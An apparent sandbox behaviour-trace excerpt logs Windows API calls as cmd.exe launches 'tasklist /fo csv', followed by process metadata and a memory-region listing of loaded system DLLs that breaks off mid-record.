[0571.861] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b000, lpFilePart=0x28f440 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x28f440*="system32") returned 0x13
[0571.861] SetErrorMode (uMode=0x0) returned 0x1
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6aff0, Size=0x4a) returned 0x6aff0
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6aff0) returned 0x4a
[0571.861] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8af360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0571.862] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0571.862] GetProcessHeap () returned 0x50000
[0571.862] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x1ce) returned 0x6a1a0
[0571.862] GetProcessHeap () returned 0x50000
[0571.862] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x38c) returned 0x6b050
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6b050, Size=0x1d0) returned 0x6b050
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6b050) returned 0x1d0
[0571.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8af360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xe8) returned 0x6a380
[0571.869] GetProcessHeap () returned 0x50000
[0571.869] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6a380, Size=0x7e) returned 0x6a380
[0571.869] GetProcessHeap () returned 0x50000
[0571.869] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6a380) returned 0x7e
[0571.870] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*" (normalized: "c:\\windows\\system32\\tasklist.*"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x6a410
[0571.870] GetProcessHeap () returned 0x50000
[0571.870] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x0, Size=0x28) returned 0x647f0
[0571.870] FindClose (in: hFindFile=0x6a410 | out: hFindFile=0x6a410) returned 1
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM" (normalized: "c:\\windows\\system32\\tasklist.com"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0xffffffffffffffff
[0571.870] GetLastError () returned 0x2
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE" (normalized: "c:\\windows\\system32\\tasklist.exe"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x6a410
[0571.870] GetProcessHeap () returned 0x50000
[0571.870] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x647f0, Size=0x8) returned 0x68620
[0571.870] FindClose (in: hFindFile=0x6a410 | out: hFindFile=0x6a410) returned 1
[0571.870] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0571.871] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0571.871] GetConsoleTitleW (in: lpConsoleTitle=0x28f700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0571.871] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f4b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f478 | out: lpAttributeList=0x28f4b8, lpSize=0x28f478) returned 1
[0571.871] UpdateProcThreadAttribute (in: lpAttributeList=0x28f4b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f468, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f4b8, lpPreviousValue=0x0) returned 1
[0571.871] GetStartupInfoW (in: lpStartupInfo=0x28f5d0 | out: lpStartupInfo=0x28f5d0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0571.871] GetProcessHeap () returned 0x50000
[0571.871] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x20) returned 0x647f0
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0571.874] GetProcessHeap () returned 0x50000
[0571.874] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x647f0 | out: hHeap=0x50000) returned 1
[0571.874] GetProcessHeap () returned 0x50000
[0571.874] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x12) returned 0x68640
[0571.874] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1
[0571.876] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist /fo csv ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x28f4f0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="tasklist /fo csv ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f4a0 | out: lpCommandLine="tasklist /fo csv ", lpProcessInformation=0x28f4a0*(hProcess=0x5c, hThread=0x58, dwProcessId=0x9c, dwThreadId=0x528)) returned 1
[0571.889] CloseHandle (hObject=0x58) returned 1
[0571.889] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0571.889] GetProcessHeap () returned 0x50000
[0571.889] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x50000) returned 1
[0571.889] GetEnvironmentStringsW () returned 0x68f90*
[0571.890] GetProcessHeap () returned 0x50000
[0571.890] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb78) returned 0x6b610
[0571.890] memcpy (in: _Dst=0x6b610, _Src=0x68f90, _Size=0xb78 | out: _Dst=0x6b610) returned 0x6b610
[0571.890] FreeEnvironmentStringsW (penv=0x68f90) returned 1
[0571.890] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0xffffffff) returned 0x0
[0573.671] GetExitCodeProcess (in: hProcess=0x5c, lpExitCode=0x28f3e8 | out: lpExitCode=0x28f3e8*=0x0) returned 1
[0573.671] CloseHandle (hObject=0x5c) returned 1
[0573.671] _vsnwprintf (in: _Buffer=0x28f658, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f3f8 | out: _Buffer="00000000") returned 8
[0573.671] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0573.671] GetProcessHeap () returned 0x50000
[0573.672] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6b610 | out: hHeap=0x50000) returned 1
[0573.672] GetEnvironmentStringsW () returned 0x6cd40*
[0573.672] GetProcessHeap () returned 0x50000
[0573.672] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb9e) returned 0x6d8f0
[0573.672] memcpy (in: _Dst=0x6d8f0, _Src=0x6cd40, _Size=0xb9e | out: _Dst=0x6d8f0) returned 0x6d8f0
[0573.672] FreeEnvironmentStringsW (penv=0x6cd40) returned 1
[0573.672] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0573.672] GetProcessHeap () returned 0x50000
[0573.673] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6d8f0 | out: hHeap=0x50000) returned 1
[0573.673] GetEnvironmentStringsW () returned 0x6cd40*
[0573.673] GetProcessHeap () returned 0x50000
[0573.673] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb9e) returned 0x6d8f0
[0573.673] memcpy (in: _Dst=0x6d8f0, _Src=0x6cd40, _Size=0xb9e | out: _Dst=0x6d8f0) returned 0x6d8f0
[0573.673] FreeEnvironmentStringsW (penv=0x6cd40) returned 1
[0573.673] GetProcessHeap () returned 0x50000
[0573.673] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x68640 | out: hHeap=0x50000) returned 1
[0573.673] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f4b8 | out: lpAttributeList=0x28f4b8)
[0573.673] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0573.675] _close (_FileHandle=3) returned 0
[0573.676] _get_osfhandle (_FileHandle=1) returned 0x7
[0573.676] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0573.676] _get_osfhandle (_FileHandle=1) returned 0x7
[0573.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8ae194 | out: lpMode=0x4a8ae194) returned 1
[0573.677] _get_osfhandle (_FileHandle=0) returned 0x3
[0573.677] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8ae198 | out: lpMode=0x4a8ae198) returned 1
[0573.677] SetConsoleInputExeNameW () returned 0x1
[0573.677] GetConsoleOutputCP () returned 0x1b5
[0573.677] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8bbfe0 | out: lpCPInfo=0x4a8bbfe0) returned 1
[0573.677] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0573.678] exit (_Code=0)
Process:
id = "36"
image_name = "tasklist.exe"
filename = "c:\\windows\\system32\\tasklist.exe"
page_root = "0x645d1000"
os_pid = "0x9c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "35"
os_parent_pid = "0x3f8"
cmd_line = "tasklist /fo csv "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5249
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5250
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5251
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5252
start_va = 0x110000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 5253
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5254
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 5255
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 5256
start_va = 0xff980000
end_va = 0xff99dfff
monitored = 0
entry_point = 0xff9936e4
region_type = mapped_file
name = "tasklist.exe"
filename = "\\Windows\\System32\\tasklist.exe" (normalized: "c:\\windows\\system32\\tasklist.exe")
Region:
id = 5257
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5258
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 5259
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 5260
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 5261
start_va = 0x190000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5262
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5263
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5264
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5265
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 5266
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5267
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 5268
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5276
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5277
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5278
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5279
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5280
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5281
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5282
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5283
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5284
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5285
start_va = 0x7fefcd40000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5286
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 5287
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5288
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 5289
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5290
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5291
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5292
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 5293
start_va = 0x7fefbdd0000
end_va = 0x7fefbde5fff
monitored = 0
entry_point = 0x7fefbdd11a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5294
start_va = 0x7fefbdc0000
end_va = 0x7fefbdcbfff
monitored = 0
entry_point = 0x7fefbdc18a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5295
start_va = 0x7fefd970000
end_va = 0x7fefd992fff
monitored = 0
entry_point = 0x7fefd971198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5296
start_va = 0x7fefbda0000
end_va = 0x7fefbdb4fff
monitored = 0
entry_point = 0x7fefbda1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5297
start_va = 0x7fef85b0000
end_va = 0x7fef86d4fff
monitored = 0
entry_point = 0x7fef8601570
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 5298
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5299
start_va = 0x390000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 5300
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5301
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 5302
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5303
start_va = 0x4a0000
end_va = 0x627fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 5304
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5305
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5306
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5307
start_va = 0x630000
end_va = 0x7b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 5308
start_va = 0x7c0000
end_va = 0x1bbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007c0000"
filename = ""
Region:
id = 5309
start_va = 0xc0000
end_va = 0xc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tasklist.exe.mui"
filename = "\\Windows\\System32\\en-US\\tasklist.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\tasklist.exe.mui")
Region:
id = 5313
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 5314
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 5315
start_va = 0x1bc0000
end_va = 0x1ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bc0000"
filename = ""
Region:
id = 5316
start_va = 0x390000
end_va = 0x44ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5317
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 5318
start_va = 0x1bc0000
end_va = 0x1c3cfff
monitored = 0
entry_point = 0x1bccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5319
start_va = 0x1c50000
end_va = 0x1ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 5320
start_va = 0x1bc0000
end_va = 0x1c3cfff
monitored = 0
entry_point = 0x1bccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5321
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 5332
start_va = 0x1dd0000
end_va = 0x1e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dd0000"
filename = ""
Region:
id = 5333
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 5334
start_va = 0xf0000
